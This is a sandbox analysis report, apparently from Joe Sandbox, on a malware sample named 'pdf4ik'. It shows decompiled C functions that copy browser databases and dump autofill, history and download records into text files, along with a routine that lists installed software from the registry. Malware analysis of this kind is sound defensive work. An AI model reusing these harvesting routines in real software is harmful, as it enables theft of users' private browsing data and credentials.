                                        0x29d9a86d
                                        0x29d9a880
                                        0x29d9a8a2
                                        0x29d9a8a8
                                        0x29d9a8bc
                                        0x29d9a8c2
                                        0x29d9a8c7
                                        0x29d9a9e3
                                        0x29d9aa00
                                        0x29d9aa00
                                        0x29d9a8df
                                        0x29d9a8e5
                                        0x29d9a8ea
                                        0x29d9a9c3
                                        0x29d9a9ca
                                        0x29d9a9da
                                        0x00000000
                                        0x29d9a9e0
                                        0x29d9a903
                                        0x29d9a90c
                                        0x29d9a912
                                        0x29d9a918
                                        0x29d9a97c
                                        0x29d9a97d
                                        0x29d9a983
                                        0x29d9a98b
                                        0x29d9a999
                                        0x29d9a99c
                                        0x29d9a9be
                                        0x29d9a99e
                                        0x29d9a99e
                                        0x29d9a99e
                                        0x29d9a98d
                                        0x29d9a98d
                                        0x29d9a98d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9a91a
                                        0x29d9a91a
                                        0x29d9a923
                                        0x29d9a932
                                        0x29d9a934
                                        0x29d9a93f
                                        0x29d9a941
                                        0x29d9a94d
                                        0x29d9a955
                                        0x29d9a961
                                        0x29d9a96e
                                        0x29d9a974
                                        0x29d9a977
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9A7EC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A802
                                        • _malloc.LIBCMT ref: 29D9A80A
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A817
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A830
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A845
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9A85D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A86D
                                        • _memset.LIBCMT ref: 29D9A880
                                        • wsprintfA.USER32 ref: 29D9A8A2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A8F6
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A8FD
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A941
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A94D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A955
                                        • lstrcatA.KERNEL32(00000000,29DCFC38), ref: 29D9A961
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A97D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Downloads\%s_%s.txt
                                        • API String ID: 3817689429-2163029947
                                        • Opcode ID: 39dd97fdc10f5f7dd9ef2c8ca5e1a4eaf00805bd2694c79f0374eb6d1a830ba3
                                        • Instruction ID: 0406fac1567fdbd9b99a2188569fb62d703d6bef8ac3f0e7c2250f09eb37c476
                                        • Opcode Fuzzy Hash: 39dd97fdc10f5f7dd9ef2c8ca5e1a4eaf00805bd2694c79f0374eb6d1a830ba3
                                        • Instruction Fuzzy Hash: FD51E3B2941254BBDB11ABA4EC49FDA7778BF58B01F00859CF509D6200DA389A41DBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D91230 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 168stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E29D91230(void* __eflags) {
				signed int _v8;
				char _v5012;
				char _v10012;
				char _v25012;
				char _v75012;
				char _v125012;
				CHAR* _v125016;
				char _v125020;
				CHAR* _v125024;
				signed int _v125028;
				void* __ebx;
				char* __edi;
				CHAR* __esi;
				signed int _t38;
				signed int _t40;
				CHAR* _t47;
				signed int _t52;
				void* _t55;
				char* _t56;
				char _t67;
				CHAR* _t68;
				signed int _t69;
				void* _t70;
				void* _t76;

				E29DBCDB0(0x1e864);
				_t38 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t38 ^ _t69;
				_t40 =  *0x29dd82ec; // 0x0
				_v125028 = _t40;
				_v125016 = 0;
				E29DB5640( &_v75012, 0, 0xc350);
				E29DB5640( &_v10012, 0, 0x1388);
				E29DB5640( &_v5012, 0, 0x1388);
				E29DB5640( &_v125012, 0, 0xc350);
				E29DB5640( &_v25012, 0, 0x3a98);
				_t47 =  *0x29dd82d8; // 0x75d71020
				lstrcatA( &_v75012, _t47);
				_t65 =  &_v125020;
				_t68 = E29DAEA8E(_t55,  &_v125020, _t67,  &_v75012, ";",  &_v125020);
				_t76 = _t70 + 0x48;
				_t56 = 1;
				if(_t68 == 0) {
					L15:
					return E29DADF46(_t50, _t56, _v8 ^ _t69, _t65, _t67, _t68);
				} else {
					_t67 = _v125020;
					do {
						_t13 = _t56 - 1; // 0x0
						_t52 = _t13;
						if(_t52 > 5) {
							goto L14;
						}
						switch( *((intOrPtr*)(_t52 * 4 +  &M29D9148C))) {
							case 0:
								E29DB5640( &_v10012, 0, 0x1388);
								_t76 = _t76 + 0xc;
								lstrcatA( &_v10012, _t68);
								goto L14;
							case 1:
								 &_v5012 = E29DB5640( &_v5012, 0, 0x1388);
								__ecx =  &_v5012;
								__eax = lstrcatA( &_v5012, __esi);
								goto L14;
							case 2:
								__edx =  &_v125012;
								E29DB5640( &_v125012, 0, 0xc350) =  &_v125012;
								__eax = lstrcatA( &_v125012, __esi);
								goto L14;
							case 3:
								_push(__esi);
								__eax = E29DAEC33();
								__esp = __esp + 4;
								_v125024 = __eax;
								goto L14;
							case 4:
								_push("true");
								_push(__esi);
								__eax =  *0x29dd8550();
								if(__eax != 0) {
									_push("false");
									_push(__esi);
									if( *0x29dd8550() != 0) {
										_push(__esi);
										__edi = 1;
										__eax = E29DAEC33();
										__esp = __esp + 4;
										_v125016 = __eax;
									} else {
										__edi = 0;
									}
								} else {
									_t23 =  &(__eax[1]); // 0x1
									__edi = _t23;
									_v125016 = 0x3e7;
								}
								goto L14;
							case 5:
								__ecx =  &_v25012;
								__eax = E29DB5640( &_v25012, 0, 0x3a98);
								__edx =  &_v25012;
								lstrcatA( &_v25012, __esi) = _v125016;
								__eax = _v125024;
								__ecx =  &_v125012;
								__edx =  &_v5012;
								__edx = _v125028;
								__ecx =  &_v10012;
								__ecx = __esi;
								__eax = E29D90880(__esi, __edx,  &_v10012, _v125024,  &_v5012,  &_v125012, __edi, _v125016);
								__ebx = 0;
								goto L14;
						}
						L14:
						_t65 =  &_v125020;
						_t56 =  &(_t56[1]);
						_t68 = E29DAEA8E(_t56,  &_v125020, _t67, 0, ";",  &_v125020);
						_t76 = _t76 + 0xc;
					} while (_t68 != 0);
					goto L15;
				}
			}



























                                        0x29d91238
                                        0x29d9123d
                                        0x29d91244
                                        0x29d91247
                                        0x29d9125d
                                        0x29d91263
                                        0x29d9126d
                                        0x29d91283
                                        0x29d91299
                                        0x29d912af
                                        0x29d912c5
                                        0x29d912ca
                                        0x29d912da
                                        0x29d912e0
                                        0x29d912f8
                                        0x29d912fa
                                        0x29d912fd
                                        0x29d91304
                                        0x29d91479
                                        0x29d91489
                                        0x29d9130a
                                        0x29d9130a
                                        0x29d91310
                                        0x29d91310
                                        0x29d91310
                                        0x29d91316
                                        0x00000000
                                        0x00000000
                                        0x29d9131c
                                        0x00000000
                                        0x29d91331
                                        0x29d91336
                                        0x29d91341
                                        0x00000000
                                        0x00000000
                                        0x29d9135a
                                        0x29d91363
                                        0x29d9136a
                                        0x00000000
                                        0x00000000
                                        0x29d9137a
                                        0x29d9138c
                                        0x29d91393
                                        0x00000000
                                        0x00000000
                                        0x29d9139e
                                        0x29d9139f
                                        0x29d913a4
                                        0x29d913a7
                                        0x00000000
                                        0x00000000
                                        0x29d913b2
                                        0x29d913b7
                                        0x29d913b8
                                        0x29d913c0
                                        0x29d913d4
                                        0x29d913d9
                                        0x29d913e2
                                        0x29d913e8
                                        0x29d913e9
                                        0x29d913ee
                                        0x29d913f3
                                        0x29d913f6
                                        0x29d913e4
                                        0x29d913e4
                                        0x29d913e4
                                        0x29d913c2
                                        0x29d913c2
                                        0x29d913c2
                                        0x29d913c5
                                        0x29d913c5
                                        0x00000000
                                        0x00000000
                                        0x29d91403
                                        0x29d9140c
                                        0x29d91415
                                        0x29d91422
                                        0x29d91429
                                        0x29d91430
                                        0x29d91437
                                        0x29d9143e
                                        0x29d91445
                                        0x29d9144c
                                        0x29d9144e
                                        0x29d91456
                                        0x00000000
                                        0x00000000
                                        0x29d91458
                                        0x29d91458
                                        0x29d91466
                                        0x29d9146c
                                        0x29d9146e
                                        0x29d91471
                                        0x00000000
                                        0x29d91310

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$_strtok_s
                                        • String ID: false$true
                                        • API String ID: 657882108-2658103896
                                        • Opcode ID: ad76f058559a5c02415c6740ec4ec15eadf0a47a06738b9a1a18726cca402c55
                                        • Instruction ID: 7195d7a0d08ed0d23fb902d808b4475becdc8e5444ffc28647940860c54baa08
                                        • Opcode Fuzzy Hash: ad76f058559a5c02415c6740ec4ec15eadf0a47a06738b9a1a18726cca402c55
                                        • Instruction Fuzzy Hash: 3451E3B2940254A7D724FBA4DC84FDE73B8AF18700F04859CFA09AB580EE74574A9BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9A320 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 167stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D9A320(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr* _v560;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t35;
				signed int _t43;
				void* _t53;
				long _t56;
				void* _t63;
				int _t64;
				void* _t73;
				CHAR* _t76;
				intOrPtr* _t84;
				void* _t98;
				void* _t99;
				void* _t100;
				CHAR* _t101;
				CHAR* _t102;
				signed int _t103;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t110;
				signed int _t115;

				_t74 = __ebx;
				_t34 =  *0x29dd5664; // 0xd9555f04
				_t35 = _t34 ^ _t103;
				_t115 = _t35;
				_v8 = _t35;
				_v556 = _a4;
				_v552 = __ecx;
				_v560 = __edx;
				E29DB5640( &_v276, 0, 0x104);
				_t76 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v276, _t76);
				_t101 = E29DADFE0( &_v276, _t98, _t100, 0x1a);
				 *_t101 = 0;
				E29DAFCE4(GetTickCount());
				_t107 = _t104 + 0x14;
				_t99 = 0x1a;
				do {
					_t43 = E29DAFCF6(_t115);
					asm("cdq");
					_push(_t43 % 0xa);
					_push(_t101);
					wsprintfA(_t101, "%s%d");
					_t107 = _t107 + 0x10;
					_t99 = _t99 - 1;
				} while (_t99 != 0);
				_t101[0x1a] = 0;
				lstrcatA( &_v276, _t101);
				CopyFileA(__ebx,  &_v276, 1);
				E29DB5640( &_v540, _t99, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
				_t102 =  *0x29dd81c4; // 0x1591c28
				_t53 =  *0x29dd8344( &_v276,  &_v548);
				_t109 = _t107 + 0x24;
				if(_t53 != 0) {
					L12:
					return E29DADF46(DeleteFileA( &_v276), _t74, _v8 ^ _t103,  &_v276, _t99, _t102);
				}
				_t56 =  *0x29dd82f8(_v548, _t102, 0xffffffff,  &_v544, _t53);
				_t110 = _t109 + 0x14;
				if(_t56 != 0) {
					L11:
					 *0x29dd8318(_v544);
					 *0x29dd8348(_v548);
					goto L12;
				}
				_t102 = HeapAlloc(GetProcessHeap(), _t56, 0xf423f);
				_t63 =  *0x29dd8314(_v544);
				_t110 = _t110 + 4;
				if(_t63 != 0x64) {
					L6:
					_t64 = lstrlenA(_t102);
					_t84 = _v560;
					if(_t84 != 0) {
						__eflags =  *_t84 - 2;
						if( *_t84 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t84 + 4)), _t102,  &_v540, _t64, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L11;
				} else {
					goto L5;
				}
				do {
					L5:
					lstrcatA(_t102,  *0x29dd8334(_v544, 0));
					lstrcatA(_t102, " ");
					lstrcatA(_t102,  *0x29dd8334(_v544, 1));
					lstrcatA(_t102, "\n");
					_t73 =  *0x29dd8314(_v544);
					_t110 = _t110 + 0x14;
				} while (_t73 == 0x64);
				goto L6;
			}


































                                        0x29d9a320
                                        0x29d9a329
                                        0x29d9a32e
                                        0x29d9a32e
                                        0x29d9a330
                                        0x29d9a33d
                                        0x29d9a34c
                                        0x29d9a352
                                        0x29d9a358
                                        0x29d9a35d
                                        0x29d9a36e
                                        0x29d9a37b
                                        0x29d9a380
                                        0x29d9a38a
                                        0x29d9a38f
                                        0x29d9a392
                                        0x29d9a397
                                        0x29d9a397
                                        0x29d9a39c
                                        0x29d9a3a4
                                        0x29d9a3a5
                                        0x29d9a3ac
                                        0x29d9a3b2
                                        0x29d9a3b5
                                        0x29d9a3b5
                                        0x29d9a3c0
                                        0x29d9a3c4
                                        0x29d9a3d4
                                        0x29d9a3e7
                                        0x29d9a409
                                        0x29d9a40f
                                        0x29d9a423
                                        0x29d9a429
                                        0x29d9a42e
                                        0x29d9a549
                                        0x29d9a565
                                        0x29d9a565
                                        0x29d9a446
                                        0x29d9a44c
                                        0x29d9a451
                                        0x29d9a529
                                        0x29d9a530
                                        0x29d9a540
                                        0x00000000
                                        0x29d9a546
                                        0x29d9a46a
                                        0x29d9a473
                                        0x29d9a479
                                        0x29d9a47f
                                        0x29d9a4e2
                                        0x29d9a4e3
                                        0x29d9a4e9
                                        0x29d9a4f1
                                        0x29d9a4ff
                                        0x29d9a502
                                        0x29d9a524
                                        0x29d9a504
                                        0x29d9a504
                                        0x29d9a504
                                        0x29d9a4f3
                                        0x29d9a4f3
                                        0x29d9a4f3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9a481
                                        0x29d9a481
                                        0x29d9a495
                                        0x29d9a4a1
                                        0x29d9a4bb
                                        0x29d9a4c7
                                        0x29d9a4d4
                                        0x29d9a4da
                                        0x29d9a4dd
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9A358
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A36E
                                        • _malloc.LIBCMT ref: 29D9A376
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A383
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A397
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A3AC
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A3C4
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A3D4
                                        • _memset.LIBCMT ref: 29D9A3E7
                                        • wsprintfA.USER32 ref: 29D9A409
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A45D
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A464
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A495
                                        • lstrcatA.KERNEL32(00000000,29DCFF6C), ref: 29D9A4A1
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A4BB
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A4C7
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A4E3
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A550
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Autofill\%s_%s.txt
                                        • API String ID: 3817689429-429343355
                                        • Opcode ID: 84056291cec806d0237956678e1e48046c9cd4df4a60c3539d7fbdcba457583d
                                        • Instruction ID: 577ae7045303820bb45160e6c255c03636ba6be226ecfa653173d8cf5e16e3b2
                                        • Opcode Fuzzy Hash: 84056291cec806d0237956678e1e48046c9cd4df4a60c3539d7fbdcba457583d
                                        • Instruction Fuzzy Hash: 685106B2981254ABD711EBA4EC49FDA7778AF58B01F00819CF509D6240DA389A45EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA30D0 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 127registrystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E29DA30D0(CHAR* __esi) {
				signed int _v8;
				char _v1032;
				char _v2056;
				char _v3080;
				int _v3084;
				void* _v3088;
				void* _v3092;
				int* _v3096;
				int _v3100;
				void* __ebx;
				void* __edi;
				signed int _t36;
				void* _t75;
				long _t76;
				CHAR* _t77;
				signed int _t78;
				void* _t79;

				_t77 = __esi;
				_t36 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t36 ^ _t78;
				_v3092 = 0;
				_v3088 = 0;
				_v3100 = 0xf003f;
				_v3084 = 0;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v3092) == 0) {
					_v3096 = 0;
					_push(_t75);
					do {
						_t71 =  &_v3080;
						_v3084 = 0x400;
						_t76 = RegEnumKeyExA(_v3092, _v3096,  &_v3080,  &_v3084, 0, 0, 0, 0);
						if(_t76 != 0) {
							goto L9;
						} else {
							wsprintfA( &_v2056, "%s\\%s", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v3080);
							_t79 = _t79 + 0x10;
							if(RegOpenKeyExA(0x80000002,  &_v2056, 0, 0x20019,  &_v3088) != 0) {
								_t71 = _v3088;
								RegCloseKey(_v3088);
								_t39 = RegCloseKey(_v3092);
							} else {
								_t71 =  &_v3100;
								_v3084 = 0x400;
								if(RegQueryValueExA(_v3088, "DisplayName", 0,  &_v3100,  &_v1032,  &_v3084) == 0) {
									lstrcatA(_t77,  &_v1032);
									_t71 = _v3088;
									_v3084 = 0x400;
									if(RegQueryValueExA(_v3088, "DisplayVersion", 0,  &_v3100,  &_v1032,  &_v3084) == 0) {
										lstrcatA(_t77, " [");
										lstrcatA(_t77,  &_v1032);
										lstrcatA(_t77, "]");
									}
									lstrcatA(_t77, "\n");
								}
								RegCloseKey(_v3088);
								goto L9;
							}
						}
						L11:
						_pop(_t75);
						goto L12;
						L9:
						_v3096 = _v3096 + 1;
					} while (_t76 == 0);
					_t39 = RegCloseKey(_v3092);
					goto L11;
				}
				L12:
				return E29DADF46(_t39, 0, _v8 ^ _t78, _t71, _t75, _t77);
			}




















                                        0x29da30d0
                                        0x29da30d9
                                        0x29da30e0
                                        0x29da30fd
                                        0x29da3103
                                        0x29da3109
                                        0x29da3113
                                        0x29da3121
                                        0x29da3127
                                        0x29da312d
                                        0x29da3130
                                        0x29da3147
                                        0x29da3150
                                        0x29da3160
                                        0x29da3164
                                        0x00000000
                                        0x29da316a
                                        0x29da3182
                                        0x29da3188
                                        0x29da31ac
                                        0x29da3296
                                        0x29da329d
                                        0x29da3280
                                        0x29da31b2
                                        0x29da31c6
                                        0x29da31d4
                                        0x29da31e6
                                        0x29da31f0
                                        0x29da31fd
                                        0x29da3218
                                        0x29da322a
                                        0x29da3232
                                        0x29da3240
                                        0x29da324c
                                        0x29da324c
                                        0x29da3258
                                        0x29da3258
                                        0x29da3265
                                        0x00000000
                                        0x29da3265
                                        0x29da31ac
                                        0x29da3280
                                        0x29da3286
                                        0x00000000
                                        0x29da326b
                                        0x29da326b
                                        0x29da3271
                                        0x29da3280
                                        0x00000000
                                        0x29da3280
                                        0x29da3287
                                        0x29da3295

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000), ref: 29DA3119
                                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000010), ref: 29DA315A
                                        • wsprintfA.USER32 ref: 29DA3182
                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 29DA31A4
                                        • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,?,?,00000400), ref: 29DA31DE
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA31F0
                                        • RegQueryValueExA.ADVAPI32(?,DisplayVersion,00000000,?,?,00000400), ref: 29DA3222
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29DA3232
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA3240
                                        • lstrcatA.KERNEL32(?,29DD07BC), ref: 29DA324C
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29DA3258
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3265
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3280
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA329D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
                                        • String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                        • API String ID: 3722822016-3437733507
                                        • Opcode ID: bbd6fb863aa9435a242b54666d4843761af452f8dbcb116383ccace318187c6b
                                        • Instruction ID: 6aeaf391a9660052ebd90b5b938b8db34778e90f5024ad0338cb7b4847e2ddd6
                                        • Opcode Fuzzy Hash: bbd6fb863aa9435a242b54666d4843761af452f8dbcb116383ccace318187c6b
                                        • Instruction Fuzzy Hash: 6F4109B6900118AFE715DF64DDC4EEAB77DEB48744F40829DE209A3101EE745E8ADF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9A570 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 160stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E29D9A570(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr* _v560;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t35;
				signed int _t43;
				void* _t53;
				long _t57;
				CHAR* _t62;
				void* _t63;
				int _t64;
				void* _t71;
				CHAR* _t74;
				intOrPtr* _t83;
				intOrPtr _t93;
				void* _t97;
				void* _t98;
				void* _t99;
				CHAR* _t100;
				signed int _t101;
				void* _t102;
				void* _t105;
				void* _t107;
				void* _t108;
				signed int _t112;

				_t72 = __ebx;
				_t34 =  *0x29dd5664; // 0xd9555f04
				_t35 = _t34 ^ _t101;
				_t112 = _t35;
				_v8 = _t35;
				_v556 = _a4;
				_v552 = __ecx;
				_v560 = __edx;
				E29DB5640( &_v276, 0, 0x104);
				_t74 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v276, _t74);
				_t100 = E29DADFE0( &_v276, _t97, _t99, 0x1a);
				 *_t100 = 0;
				E29DAFCE4(GetTickCount());
				_t105 = _t102 + 0x14;
				_t98 = 0x1a;
				do {
					_t43 = E29DAFCF6(_t112);
					asm("cdq");
					_push(_t43 % 0xa);
					_push(_t100);
					wsprintfA(_t100, "%s%d");
					_t105 = _t105 + 0x10;
					_t98 = _t98 - 1;
				} while (_t98 != 0);
				_t100[0x1a] = 0;
				lstrcatA( &_v276, _t100);
				CopyFileA(__ebx,  &_v276, 1);
				E29DB5640( &_v540, _t98, 0x104);
				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
				_t53 =  *0x29dd8344( &_v276,  &_v548);
				_t107 = _t105 + 0x24;
				if(_t53 != 0) {
					L12:
					return E29DADF46(DeleteFileA( &_v276), _t72, _v8 ^ _t101,  &_v276, _t98, _t100);
				}
				_t93 =  *0x29dd7ec0; // 0x159cd90
				_t57 =  *0x29dd82f8(_v548, _t93, 0xffffffff,  &_v544, _t53);
				_t108 = _t107 + 0x14;
				if(_t57 != 0) {
					L11:
					 *0x29dd8318(_v544);
					 *0x29dd8348(_v548);
					goto L12;
				}
				_t62 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
				_t100 = _t62;
				_t63 =  *0x29dd8314(_v544);
				_t108 = _t108 + 4;
				if(_t63 != 0x64) {
					L6:
					_t64 = lstrlenA(_t100);
					_t83 = _v560;
					if(_t83 != 0) {
						__eflags =  *_t83 - 2;
						if( *_t83 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t83 + 4)), _t100,  &_v540, _t64, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L11;
				} else {
					goto L5;
				}
				do {
					L5:
					 *0x29dd8334(_v544, 0);
					lstrcatA(_t100,  *0x29dd8334(_v544, 0));
					lstrcatA(_t100, "\n");
					_t71 =  *0x29dd8314(_v544);
					_t108 = _t108 + 0x14;
				} while (_t71 == 0x64);
				goto L6;
			}



































                                        0x29d9a570
                                        0x29d9a579
                                        0x29d9a57e
                                        0x29d9a57e
                                        0x29d9a580
                                        0x29d9a58d
                                        0x29d9a59c
                                        0x29d9a5a2
                                        0x29d9a5a8
                                        0x29d9a5ad
                                        0x29d9a5be
                                        0x29d9a5cb
                                        0x29d9a5d0
                                        0x29d9a5da
                                        0x29d9a5df
                                        0x29d9a5e2
                                        0x29d9a5e7
                                        0x29d9a5e7
                                        0x29d9a5ec
                                        0x29d9a5f4
                                        0x29d9a5f5
                                        0x29d9a5fc
                                        0x29d9a602
                                        0x29d9a605
                                        0x29d9a605
                                        0x29d9a610
                                        0x29d9a614
                                        0x29d9a624
                                        0x29d9a637
                                        0x29d9a659
                                        0x29d9a66d
                                        0x29d9a673
                                        0x29d9a678
                                        0x29d9a782
                                        0x29d9a79e
                                        0x29d9a79e
                                        0x29d9a67e
                                        0x29d9a696
                                        0x29d9a69c
                                        0x29d9a6a1
                                        0x29d9a762
                                        0x29d9a769
                                        0x29d9a779
                                        0x00000000
                                        0x29d9a77f
                                        0x29d9a6b4
                                        0x29d9a6c1
                                        0x29d9a6c3
                                        0x29d9a6c9
                                        0x29d9a6cf
                                        0x29d9a71b
                                        0x29d9a71c
                                        0x29d9a722
                                        0x29d9a72a
                                        0x29d9a738
                                        0x29d9a73b
                                        0x29d9a75d
                                        0x29d9a73d
                                        0x29d9a73d
                                        0x29d9a73d
                                        0x29d9a72c
                                        0x29d9a72c
                                        0x29d9a72c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9a6d1
                                        0x29d9a6d1
                                        0x29d9a6da
                                        0x29d9a6f4
                                        0x29d9a700
                                        0x29d9a70d
                                        0x29d9a713
                                        0x29d9a716
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9A5A8
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A5BE
                                        • _malloc.LIBCMT ref: 29D9A5C6
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A5D3
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A5E7
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A5FC
